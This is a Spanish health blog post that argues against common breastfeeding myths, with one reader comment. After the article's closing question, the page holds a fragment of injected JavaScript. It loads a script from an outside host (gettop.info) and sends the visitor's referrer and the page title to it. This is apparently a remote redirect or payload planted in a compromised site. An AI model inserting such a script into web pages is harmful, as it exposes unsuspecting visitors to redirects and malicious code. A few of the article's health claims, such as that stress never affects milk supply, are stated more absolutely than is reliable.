Salud y belleza » Embarazo, Productos naturales, Salud

Los mitos de la lactancia

1 Comentario

La lactancia es una de las formas de alimento más naturales y más recomendada por la Organización Mundial de la Salud para un bebé durante los primeros seis meses de vida. Sin embargo, en países desarrollados como España a muchas mujeres se les vienen a la cabeza algunas dudas que hacen que deje de amamantar al bebé, mientras que en lugares como África no tiene más misterio que dar el pecho cuando el bebé lo requiera. Muchas mujeres en España desisten de dar el pecho y ni siquiera apuestan por esta vía en los primeros meses del bebé por prejuicios o mitos que se crean en el mundo moderno y que pocos tienen algo de cierto.

lactancia-mitos

Alguno de esos mitos es, por ejemplo, que con el pecho pequeño no se tiene suficiente leche, lo que es completamente falso ya que la cantidad no depende del tamaño del pecho ya que éste está formado por grasa. El cuerpo de la madre produce tanta leche como el niño necesite, solo hay que coger la postura correcta y dar tomas frecuentes.

Muchas mujeres se preocupan porque tienen pezones planos o invertidos, pero al final del embarazo éstos van experimentando cambios, incluso durante la lactancia. Además, el bebé a menudo agarra mucho más que el pezón, puede llegar a abarcar toda la areola.

También es recomendable darle el pecho desde el principio, aunque la leche vaya saliendo progresivamente. Con tomas constantes no hay de qué preocuparse. Eso sí, al principio la leche es más acuosa y tiene más azúcares, pero no es que alimente menos. Lo importante es que el bebé tome a demanda. Además, conforme se vaya vaciando el pecho se irá espesando la leche llenándose de grasas que sacian y engordan al bebé.

Por otro lado, es falso que los alimentos influyan en la producción de leche. Si bebes más leche, no tienes más leche en el pecho ni los alimentos producen gas en la leche materna

amamantar-mitosEn cuanto a la frecuencia no es cierto que haya que dar el pecho cada tres horas para que se “recargue”. Hay que hacerlo tan frecuentemente como el bebé lo requiera, tanto de día como de noche. Es lo que se denomina lactancia materna a demanda y consiste en que el bebé se alimenta en función de su apetito y que deja de alimentarse cuando se sacia. Normalmente no extrae más del 70% de la leche materna disponible.

También es falsa la creencia de que es malo darle el pecho a demanda al bebé porque se generan pautas que le dañan el estómago. Al contrario, debe tomar a placer para saciarse y que su estómago se desarrolle en función de sus necesidades, sin restricciones de horarios ni de cantidades que pueden irritar y causar malestar en el bebé.

Si tu bebé empieza a demandar más de lo normal no tiene por qué ser que se quede con hambre, simplemente tiene sed, sobre todo en épocas de calor, o está en una fase de crecimiento. No siempre tomará la misma cantidad.

Casi todas las dudas llevan a la misma conclusión: tengo poca leche. Sin embargo, no es cierto, al cabo del tiempo se nota el pecho menos hinchado pero no tiene que ver con la cantidad de leche. Si se usa un sacaleches tampoco es del todo efectivo, ya que el niño bien enganchado sacará mucha más.

Otro mito muy extendido es que en cuanto llega la menstruación se acabó la lactancia. No es cierto, mientras que el niño siga una pauta de toma y lo haga de forma frecuente el pecho seguirá echando leche según la necesidad del pequeño. Lo mismo ocurre con el estrés, no influye en la producción de leche.

mitos-lactanciaEn cuanto a las enfermedades, si tienes un resfriado o la gripe no hay por qué dejar de darle el pecho al niño, puesto que a través de la leche se pasan las defensas. Para prevenir lo mejor es lavarse las manos y ponerse una mascarilla para no echar todos los gérmenes sobre el bebé. En cuanto a los medicamentos, la mayoría se pueden tomar durante la lactancia. Hay webs que te dicen la compatibilidad del medicamento con la misma por si quieres estar segura.

Si te quedas embarazada de nuevo puedes seguir amamantando al bebé, a no ser que sea una gestación de riesgo. Después, cuando nazca, puedes además amamantarlos en tándem, eso sí, en este caso deberán dar prioridad al más pequeño.

También es falso que a los seis meses el bebé es mayor para tomar el pecho. Los expertos recomiendan a partir de los seis meses introducir alimentos complementarios, pero no hay por qué abandonar la lactancia, sino que es complementaria. Durante el primer año de vida la madre sigue siendo el alimento principal.

En cuanto a la incorporación laboral, es posible continuar con la lactancia materna si se pasa bastante tiempo con el bebé, si se procede a la extracción de leche o dependiendo de la edad del bebé.

¿Crees en estos mitos de la lactancia?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Más consejos de salud y belleza : , ,

One Comment »

  • olga said:

    yo opino que dar el pecho es lo más natural del mundo, fuera perjuicios, es súper sano

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.